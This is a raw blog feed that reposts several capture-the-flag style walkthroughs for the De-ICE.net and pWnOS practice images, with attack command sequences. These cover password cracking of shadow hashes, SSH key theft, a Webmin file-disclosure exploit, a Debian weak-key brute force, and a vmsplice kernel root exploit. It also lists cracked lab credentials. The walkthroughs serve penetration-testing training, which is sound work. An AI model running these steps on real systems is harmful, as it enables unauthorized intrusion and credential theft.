type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The original post at &lt;a href="http://www.backtrack-linux.org/forums/backtrack-videos/1661-%5Bvideo%5D-de-ice-net-v1-0-1-110-%7Blevel-1-disk-1%7D.html"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Links&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://g0tmi1k.blip.tv/file/3194698"&gt;Watch video on-line&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?p1gslf4t35uammv"&gt;Download video&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What is this?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This is my walk though of how I broke into the De-ICE.net network, level 1, disk 2.&lt;br /&gt;
&lt;br /&gt;
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What do I need?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
BackTrack 4 (Final)&lt;br /&gt;
de-ice.net-1.110-1.0.iso (MD5: a626d884148c63bfc9df36f2743d7242)&lt;br /&gt;
Dictionary(s)&lt;br /&gt;
&lt;br /&gt;
Software&lt;br /&gt;
Name: De-ICE.net&lt;br /&gt;
Version: 1.1 (Level 1 - Disk 2 - IP Address: 1.110)&lt;br /&gt;
Home Page: http://www.de-ice.net or http://heorot.net/livecds/&lt;br /&gt;
&lt;br /&gt;
Download Link:&lt;br /&gt;
&lt;br /&gt;
http://www.mediafire.com/?tnci5ewmcoyrp8o&lt;br /&gt;
http://de-ice.hackerdemia.com/lib/exe/fetch.php?id=start&amp;cache=cache&amp;media=wiki:de-ice_netcat-1.0.iso&lt;br /&gt;
http://heorot.net/instruction/tutorials/iso/de-ice.net-1.110-1.0.iso&lt;br /&gt;
&lt;br /&gt;
Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=16&amp;t=13&lt;br /&gt;
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nmap -n 192.168.1.1-255&lt;br /&gt;
&lt;br /&gt;
nmap -n -sS -sV -O 192.168.1.110&lt;br /&gt;
&lt;br /&gt;
firefox 192.168.1.110&lt;br /&gt;
&lt;br /&gt;
[+]kate -&gt; make list of possible usernames&lt;br /&gt;
&lt;br /&gt;
// lastF, fLast&lt;br /&gt;
&lt;br /&gt;
ftp 192.168.1.110&lt;br /&gt;
&lt;br /&gt;
// Username: anonymous. Password: [Blank]&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd download&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd etc&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
get core&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
strings core&lt;br /&gt;
&lt;br /&gt;
[+]Copy from 'root:$...' to '[EOF]'. Kate -&gt; New -&gt; Paste. Format so each username is one its own line -&gt; Save. Filename: shadow&lt;br /&gt;
&lt;br /&gt;
cd tools/dictionary/&lt;br /&gt;
&lt;br /&gt;
cat common-1 common-2 common-3 common-4 wordlist.txt &gt;&gt; /root/passwords&lt;br /&gt;
&lt;br /&gt;
john&lt;br /&gt;
&lt;br /&gt;
./john --rules --wordlist=/root/passwords /root/shadow&lt;br /&gt;
//Password: root:Complexity &amp; ccofee:Diatomaceous&lt;br /&gt;
&lt;br /&gt;
ssh ccofee@192.168.1.110&lt;br /&gt;
//Password: Diatomaceous&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd ..&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd root/&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd .save/&lt;br /&gt;
&lt;br /&gt;
su&lt;br /&gt;
//Password: Complexity&lt;br /&gt;
&lt;br /&gt;
cd .save/&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cat copy.sh&lt;br /&gt;
&lt;br /&gt;
openssl enc -d -aes-256-cbc -salt -in customer_account.csv.enc -out customer_account.csv -pass file:/etc/ssl/certs/pw&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cat customer_account.csv&lt;br /&gt;
// GAME OVER&lt;br /&gt;
&lt;br /&gt;
----------------------------------------------------------------------------------------------------&lt;br /&gt;
Users&lt;br /&gt;
root:Complexity      = root:$1$aQo/FOTu$rriwTq.pGmN3OhFe75yd30:13574:0:::::&lt;br /&gt;
aadams:              = aadams:$1$klZ09iws$fQDiqXfQXBErilgdRyogn.:13570:0:  99999:7:::&lt;br /&gt;
bbanter:Zymurgy      = bbanter:$1$1wY0b2Bt$Q6cLev2TG9eH9iIaTuFKy1:13571:0  :99999:7:::&lt;br /&gt;
ccoffee:Diatomaceous = ccoffee:$1$6yf/SuEu$EZ1TWxFMHE0pDXCCMQu70/:13574:0:99999:7:::&lt;br /&gt;
----------------------------------------------------------------------------------------------------&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Notes&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Dictionaries: http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html&lt;br /&gt;
&lt;br /&gt;
That's all!  See you!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-661479759369421009?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/661479759369421009'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/661479759369421009'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-de-icenet-v11-1110-level-1-disk-2.html' title='HOWTO : De-ICE.net v1.1 (1.110) {Level 1 - Disk 2}'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-1682556745466108689</id><published>2011-09-12T00:02:00.002+08:00</published><updated>2011-09-12T00:02:48.020+08:00</updated><title type='text'>HOWTO : De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The original post at &lt;a href="http://www.backtrack-linux.org/forums/backtrack-videos/1663-%5Bvideo%5D-de-ice-net-v2-0-1-100-%7Blevel-2-disk-1%7D.html"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Links&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://g0tmi1k.blip.tv/file/3194808"&gt;Watch video on-line&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?fy5867do96xmzao"&gt;Download video&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What is this?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This is my walk though of how I broke into the De-ICE.net network, level 2, disk 1.&lt;br /&gt;
&lt;br /&gt;
The De-ICE.net network is on a "live PenTest CD", that creates a target(s) on which to practise penetration testing; it has an "end goal" to reach.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What do I need?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
BackTrack 4 (Final)&lt;br /&gt;
de-ice.net-2.100-1.1.iso (MD5: 09798f85bf54a666fbab947300f38163)&lt;br /&gt;
Dictionary(s)&lt;br /&gt;
&lt;br /&gt;
Software&lt;br /&gt;
Name: De-ICE.net&lt;br /&gt;
Version: 2.0 (Level 1 - Disk 2 - IP Address: 1.100)&lt;br /&gt;
Home Page: http://www.de-ice.net or http://heorot.net/livecds/&lt;br /&gt;
&lt;br /&gt;
Download Link:&lt;br /&gt;
&lt;br /&gt;
http://heorot.net/instruction/tutorials/iso/de-ice.net-2.100-1.1.iso&lt;br /&gt;
http://www.mediafire.com/file/uyecnhvkeije0br/de-ice.net-2.100-1.0.part1.rar&lt;br /&gt;
http://www.mediafire.com/file/l2ezefrg05mmtrr/de-ice.net-2.100-1.0.part2.rar&lt;br /&gt;
&lt;br /&gt;
Forums/Support: http://forums.heorot.net and http://forums.heorot.net/viewtopic.php?f=18&amp;t=16&lt;br /&gt;
WiKi/Support: http://de-ice.net/hackerpedia/index.php/De-ICE.net_PenTest_Disks&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nmap -n 192.168.2.1-255&lt;br /&gt;
&lt;br /&gt;
nmap -n -sV -sS -O 192.168.2.100&lt;br /&gt;
&lt;br /&gt;
nmap -n -sV -sS -O 192.168.2.101&lt;br /&gt;
&lt;br /&gt;
firefox 192.168.2.100&lt;br /&gt;
&lt;br /&gt;
[+]kate -&gt; list of possible usernames. Save. Filename: usernames.txt&lt;br /&gt;
&lt;br /&gt;
firefox 192.168.2.101&lt;br /&gt;
&lt;br /&gt;
[+]BackTrack -&gt; Vulnerability Identification -&gt; Fuzzers -&gt; JBroFuzz. Web Directories -&gt; List of usernames (+ root, admin)  with '~' infront. -&gt; http://192.168.2.101 -&gt; 80&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
firefox http://192.168.2.101/~pirrip&lt;br /&gt;
&lt;br /&gt;
[+]kate -&gt; Update usernames with the ones which we got a respond from. Save.&lt;br /&gt;
&lt;br /&gt;
[+]BackTrck -&gt; Web Application Analysis -&gt; Web (frontend) -&gt; nikto2&lt;br /&gt;
&lt;br /&gt;
./nikto.pl -host 192.168.2.101 -r ~pirrip/ -Display 124&lt;br /&gt;
&lt;br /&gt;
firefox http://192.168.2.101/~pirrip/.ssh&lt;br /&gt;
&lt;br /&gt;
// Save both files&lt;br /&gt;
&lt;br /&gt;
mv /root/id_rsa /http://root/.ssh/id_rsa&lt;br /&gt;
&lt;br /&gt;
mv /root/id_rsa.pub /http://root/.ssh/id_rsa.pub&lt;br /&gt;
&lt;br /&gt;
chmod 000 /http://root/.ssh/id_rsa&lt;br /&gt;
&lt;br /&gt;
chmod 000 /http://root/.ssh/id_rsa.pub&lt;br /&gt;
&lt;br /&gt;
ssh pirrip@192.168.2.100&lt;br /&gt;
// Yes&lt;br /&gt;
&lt;br /&gt;
mailx&lt;br /&gt;
// 3 - we see that havisham passowrd is 'changeme'. 7 - we seen pirrip password is '0l1v3rTw1st'&lt;br /&gt;
&lt;br /&gt;
cd /etc/&lt;br /&gt;
&lt;br /&gt;
vi passwd&lt;br /&gt;
&lt;br /&gt;
// kate -&gt; Update usernames with only valid ones.&lt;br /&gt;
&lt;br /&gt;
vi group&lt;br /&gt;
&lt;br /&gt;
sudo vi shadow&lt;br /&gt;
// edit (D, :22,22y, :put, i, root, ESCape, ESCape, d + [-&gt;],[up],d d). Save it (:w), exit (:q). Password: 0l1v3rTw1st&lt;br /&gt;
&lt;br /&gt;
su&lt;br /&gt;
// Password: 0l1v3rTw1st&lt;br /&gt;
&lt;br /&gt;
cd /root/&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
cd .save/&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
chmod -R 777 /root/&lt;br /&gt;
&lt;br /&gt;
//In BackTrack//&lt;br /&gt;
&lt;br /&gt;
scp pirrip@192.168.2.100:/root/.save/great_expectations.zip /root/&lt;br /&gt;
&lt;br /&gt;
unzip great_expectations.zip&lt;br /&gt;
&lt;br /&gt;
tar xf great_expectations.tar&lt;br /&gt;
&lt;br /&gt;
strings Jan08&lt;br /&gt;
&lt;br /&gt;
//In SSH//&lt;br /&gt;
sudo iv /var/mail/havisham&lt;br /&gt;
&lt;br /&gt;
modprobe capability&lt;br /&gt;
&lt;br /&gt;
//In BackTrack//&lt;br /&gt;
ftp 192.168.2.100&lt;br /&gt;
// Usrename: pirri. Password: 0l1v3rTw1st //&lt;br /&gt;
&lt;br /&gt;
ls -a&lt;br /&gt;
&lt;br /&gt;
//In SSH//&lt;br /&gt;
&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
//In BackTrack//&lt;br /&gt;
&lt;br /&gt;
[+]Firefox -&gt; Send a REAL email to: philip.pirrip.ge@gmail.com&lt;br /&gt;
// GAME OVER&lt;br /&gt;
&lt;br /&gt;
----------------------------------------------------------------------------------------------------&lt;br /&gt;
Users&lt;br /&gt;
root:P1ckw1ckP@p3rs     root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::&lt;br /&gt;
havisham:changeme       havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::&lt;br /&gt;
pirrip:0l1v3rTw1st      pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::&lt;br /&gt;
magwitch:               magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::&lt;br /&gt;
----------------------------------------------------------------------------------------------------&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Notes&lt;/b&gt; &lt;br /&gt;
&lt;br /&gt;
Dictionaries : http://g0tmi1k.blogspot.com/2010/02/site-news-isos-and-dictionaries.html&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-1682556745466108689?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1682556745466108689'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/1682556745466108689'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-de-icenet-v20-1100-level-2-disk-1.html' title='HOWTO : De-ICE.net v2.0 (1.100) {Level 2 - Disk 1}'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-5417165622446190467</id><published>2011-09-11T23:51:00.002+08:00</published><updated>2011-09-11T23:51:47.644+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='Exploit-DB'/><title type='text'>HOWTO : pWnOS</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The original post at &lt;a href="http://www.backtrack-linux.org/forums/backtrack-videos/2748-%5Bvideo%5D-attacking-pwnos.html"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Links&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://g0tmi1k.blip.tv/file/3388825"&gt;Watch video on-line&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?65b0nursilwfyaf"&gt;Download video&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What is this?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
This is my walk though of how I broke into pWnOS v1.&lt;br /&gt;
&lt;br /&gt;
pWnOS is on a "VM Image", that creates a target on which to practice penetration testing; with the "end goal" is to get root. It was designed to practice using exploits, with multiple entry points&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Scenario&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
A company dedicated to serving Webhosting hires you to perform a penetration test on one of its servers dedicated to the administration of their systems.&lt;br /&gt;
&lt;br /&gt;
It's a linux virtual machine intentionally configured with exploitable services to provide you with a path to r00t.&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What do I need?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
BackTrack 4 (Final)&lt;br /&gt;
pWnOS.vmdk&lt;br /&gt;
exploit-db.com or milw0rm.&lt;br /&gt;
&lt;br /&gt;
Software&lt;br /&gt;
Name: pWnOS&lt;br /&gt;
Version: 1&lt;br /&gt;
Home Page: http://0dayclub.com/files/pWnOS%20v1.0.zip&lt;br /&gt;
&lt;br /&gt;
Download Link:&lt;br /&gt;
&lt;br /&gt;
http://www.mediafire.com/file/ec3hmlzuyzy/pWnOS v1.0.part1.rar&lt;br /&gt;
http://www.mediafire.com/file/yngwzqkxmin/pWnOS v1.0.part2.rar&lt;br /&gt;
http://www.mediafire.com/file/htmqm3dzgya/pWnOS v1.0.part3.rar&lt;br /&gt;
&lt;br /&gt;
http://www.0dayclub.com/public/index...nOS%20v1.0.zip&lt;br /&gt;
http://krash.in/bond00/new/pWnOS%20v1.0.zip&lt;br /&gt;
http://0dayclub.com/files/pWnOS%20v1.0.zip&lt;br /&gt;
&lt;br /&gt;
Forum/Support: http://forums.heorot.net/viewforum.php?f=21&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Commands&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;code&gt;nmap 192.168.3.1-255&lt;br /&gt;
&lt;br /&gt;
nmap -sV -sS -O 192.168.3.100&lt;br /&gt;
&lt;br /&gt;
firefox http://192.168.3.100&lt;br /&gt;
&lt;br /&gt;
firefox http://192.168.3.100:10000&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
firefox -&gt; milw0rm/explo.it -&gt; search "Webmin" -&gt; save. Filename: webmin.pl/php&lt;br /&gt;
*Webmin &lt;&gt; save. Filename: shadow&lt;br /&gt;
&lt;br /&gt;
firefox -&gt; milw0rm/explo.it -&gt; search "Debian OpenSSL" -&gt; save. Filename: ssh.py/rb&lt;br /&gt;
*Debian OpenSSL Predictable PRNG Bruteforce SSH Exploit*&lt;br /&gt;
http://milw0rm.com/exploits/5622        (perl)&lt;br /&gt;
http://milw0rm.com/exploits/5720        (python)&lt;br /&gt;
http://milw0rm.com/exploits/5632        (ruby)&lt;br /&gt;
http://www.exploit-db.com/exploits/5622 (perl)&lt;br /&gt;
http://www.exploit-db.com/exploits/5720 (python)&lt;br /&gt;
http://www.exploit-db.com/exploits/5632 (ruby)&lt;br /&gt;
&lt;br /&gt;
wget http://milw0rm.com/sploits/debian_ssh_rsa_2048_x86.tar.bz2&lt;br /&gt;
&lt;br /&gt;
perl webmin.pl 192.168.3.100 10000 /home/vmware/.ssh/authorized_keys&lt;br /&gt;
perl webmin.pl 192.168.3.100 10000 /home/obama/.ssh/authorized_keys&lt;br /&gt;
perl webmin.pl 192.168.3.100 10000 /home/osama/.ssh/authorized_keys&lt;br /&gt;
perl webmin.pl 192.168.3.100 10000 /home/yomama/.ssh/authorized_keys&lt;br /&gt;
&lt;br /&gt;
tar jxvf debian_ssh_rsa_2048_x86.tar.bz&lt;br /&gt;
&lt;br /&gt;
cd rsa/2048&lt;br /&gt;
&lt;br /&gt;
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAzASM/LKs+FLB7zfmy14qQJUrsQsEOo9FNkoilHAgvQuiE5Wy9DwYVfLrkkcDB2uubtMzGw9hl3smD/OwUyXc/lNED7MNLS8JvehZbMJv1GkkMHvv1Vfcs6FVnBIfPBz0OqFrEGf+a4JEc/eF2R6nIJDIgnjBVeNcQaIM3NOr1rYPzgDwAH/yWoKfzNv5zeMUkMZ7OVC54AovoSujQC/VRdKzGRhhLQmyFVMH9v19UrLgJB6otLcr3d8/uAB2ypTw+LmuIPe9zqrMwxskdfY4Sth2rl6D3bq6Fwca+pYh++phOyKeDPYkBi3hx6R3b3ETZlNCLJjG7+t7kwFdF02Iuw rsa/2048/*.pub&lt;br /&gt;
grep -lr AAAAB3NzaC1yc2EAAAABIwAAAQEAxRuWHhMPelB60JctxC6BDxjqQXggf0ptx2wrcAw09HayPxMnKv+BFiGA/I1yXn5EqUfuLSDcTwiIeVSvqJl3NNI5HQUUc6KGlwrhCW464ksARX2ZAp9+6Yu7DphKZmtF5QsWaiJc7oV5il89zltwBDqR362AH49m8/3OcZp4XJqEAOlVWeT5/jikmke834CyTMlIcyPL85LpFw2aXQCJQIzvkCHJAfwTpwJTugGMB5Ng73omS82Q3ErbOhTSa5iBuE86SEkyyotEBUObgWU3QW6ZMWM0Rd9ErIgvps1r/qpteMMrgieSUKlF/LaeMezSXXkZrn0x+A2bKsw9GwMetQ rsa/2048/*.pub&lt;br /&gt;
*scans for the public key...*&lt;br /&gt;
&lt;br /&gt;
ssh -i dcbe2a56e8cdea6d17495f6648329ee2-4679 obama@192.168.3.100&lt;br /&gt;
exit&lt;br /&gt;
&lt;br /&gt;
ssh -i d8629ce6dc8f2492e1454c13f46adb26-4566 vmware@192.168.3.100&lt;br /&gt;
hostname&lt;br /&gt;
uname -a&lt;br /&gt;
&lt;br /&gt;
firefox -&gt; milw0rm/explo.it -&gt; search "Linux Kernel 2.6" -&gt; save. Filename: vmsplice.c&lt;br /&gt;
*Linux Kernel 2.6.17 - 2.6.24.1 vmsplice Local Root Exploit*&lt;br /&gt;
http://milw0rm.com/exploits/5092         (c)&lt;br /&gt;
http://www.exploit-db.com/exploits/5092  (c)&lt;br /&gt;
&lt;br /&gt;
nano vmsplice.c&lt;br /&gt;
&lt;br /&gt;
gcc vmsplice.c -o vmsplice&lt;br /&gt;
&lt;br /&gt;
./vmsplice&lt;br /&gt;
&lt;br /&gt;
whoami&lt;br /&gt;
&lt;br /&gt;
----------------------------------------------------------------------------------------------------&lt;br /&gt;
Users&lt;br /&gt;
root:          root:$1$LKrO9Q3N$EBgJhPZFHiKXtK0QRqeSm/:14041:0:99999:7:::&lt;br /&gt;
vmware:        vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::&lt;br /&gt;
obama:         obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::&lt;br /&gt;
osama:         osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::&lt;br /&gt;
yomama:        yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::&lt;br /&gt;
----------------------------------------------------------------------------------------------------&lt;br /&gt;
&lt;/code&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Notes&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
I had problems with the Debian OpenSSH/OpenSSL exploit, some times it would work, else it would be really slow or just cant find the correct exploit file. The method which I use, turns it into a offline attack, which makes it more stealthy as it will not log failed logins (e.g. /var/auth/auth.log. See here for reading it). It relies on the default path tho!&lt;br /&gt;
&lt;br /&gt;
This is one method of getting in, the author did say that there is multiple ways in!&lt;br /&gt;
&lt;br /&gt;
It took me a bit of work to also to get it to work with virtual box &amp; static IP addresses.&lt;br /&gt;
&lt;br /&gt;
That's all!  See you.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/11198812-5417165622446190467?l=samiux.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5417165622446190467'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/11198812/posts/default/5417165622446190467'/><link rel='alternate' type='text/html' href='http://samiux.blogspot.com/2011/09/howto-pwnos.html' title='HOWTO : pWnOS'/><author><name>Samiux</name><uri>http://www.blogger.com/profile/01092269927993785550</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='32' height='18' src='http://1.bp.blogspot.com/-p-tkpN23Rxs/TmZHSbonpZI/AAAAAAAAABw/y9VaAJp9p0I/s220/oscp.png'/></author></entry><entry><id>tag:blogger.com,1999:blog-11198812.post-446751241770551518</id><published>2011-09-11T23:39:00.000+08:00</published><updated>2011-09-11T23:39:13.470+08:00</updated><category scheme='http://www.blogger.com/atom/ns#' term='NMap'/><category scheme='http://www.blogger.com/atom/ns#' term='Unicornscan'/><category scheme='http://www.blogger.com/atom/ns#' term='SQLmap'/><category scheme='http://www.blogger.com/atom/ns#' term='Hydra'/><title type='text'>HOWTO : De-ICE.net v1.2a (1.20a) {Level 1-Disk 3-Version A}</title><content type='html'>&lt;b&gt;&lt;code&gt;*** Do NOT attack any computer or network without authorization or you may put into jail. ***&lt;/code&gt;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Credit to : g0tmi1k&lt;br /&gt;
&lt;br /&gt;
This is g0tmi1k's work but not mine.  I re-post here for educational purpose only.  It is because I enjoy his videos very much and I am afraid of losing them.&lt;br /&gt;
&lt;br /&gt;
The original post at &lt;a href="http://www.backtrack-linux.org/forums/backtrack-5-videos/43650-%5Bvideo%5D-de-ice-net-v1-2a-1-20a-%7Blevel-1-disk-3-version-%7D.html"&gt;here&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Links&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://blip.tv/g0tmi1k/de-ice-v1-2a-1-120-5434302"&gt;Watch video on-line&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://www.mediafire.com/?8sgsv5qwtbbnyim"&gt;Download video&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Brief Overview&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
De-ICE has another challenge in its "vulnerable-by-design" series - even though the naming gets more confusing with every release! It's been a while since the last release, level 2-disk 1 (back in 2007). The students of "HackingDojo" were challenged to put together their own exploitable LiveCD, and it was released under the de-ice name. This is "version a", and should be not confused with "version B" (de-ice-1.120-1.0b.iso aka Level 1-Disk 3-Release 1-Version B), as these are NOT the same challenge - it's a different setup.&lt;br /&gt;
&lt;br /&gt;
Heorot.net release's (in date order):&lt;br /&gt;
&lt;br /&gt;
De-ICE - Level 1 - Disk 1 (de-ice.net-1.100-1.1.iso)&lt;br /&gt;
De-ICE - Level 1 - Disk 2 (de-ice.net-1.110-1.0.iso)&lt;br /&gt;
De-ICE - Level 2 - Disk 1 (de-ice.net-2.100-1.1.iso)&lt;br /&gt;
pWnOS (pWnOS v1.0.zip)&lt;br /&gt;
Hackerdemia (hackerdemia-1.1.0.iso)&lt;br /&gt;
De-ICE - Level 1 - Disk 3 - Version A (de-ice-1.120-1.0a.iso)&lt;br /&gt;
De-ICE - Level 1 - Disk 3 - Version B (de-ice-1.120-1.0b.iso)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Method&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
Pre-setup (configured IP as the host has a static IP in 192.168.1.0/24 range)&lt;br /&gt;
Scan network for the host (nmap)&lt;br /&gt;
Port scanned host (unicornscan)&lt;br /&gt;
Enumerated running services running open ports (nmap)&lt;br /&gt;
Discovered a SQL Injection (Firefox)&lt;br /&gt;
Dump all usernames &amp;amp; passwords to the database (sqlmap)&lt;br /&gt;
Tested for any repeated logins with known usernames &amp;amp; working passwords (hydra)&lt;br /&gt;
Escalated privilege by incorrectly configured settings (sudo)&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;What do I need?&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
de-ice-1.120-1.0a.iso (MD5: E8FB66760ADDF85896DB3F78F278F7D2)&lt;br /&gt;
Spare or a Virtual machine (Example: Virtual Box or VMware Player)&lt;br /&gt;
nmap – (Can be found on BackTrack 5).&lt;br /&gt;
unicornscan – (Can be found in BackTrack 5 repository).&lt;br /&gt;
sqlmap – (Can be found on BackTrack 5).&lt;br /&gt;
hydra – (Can be found on BackTrack 5).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Walkthrough&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
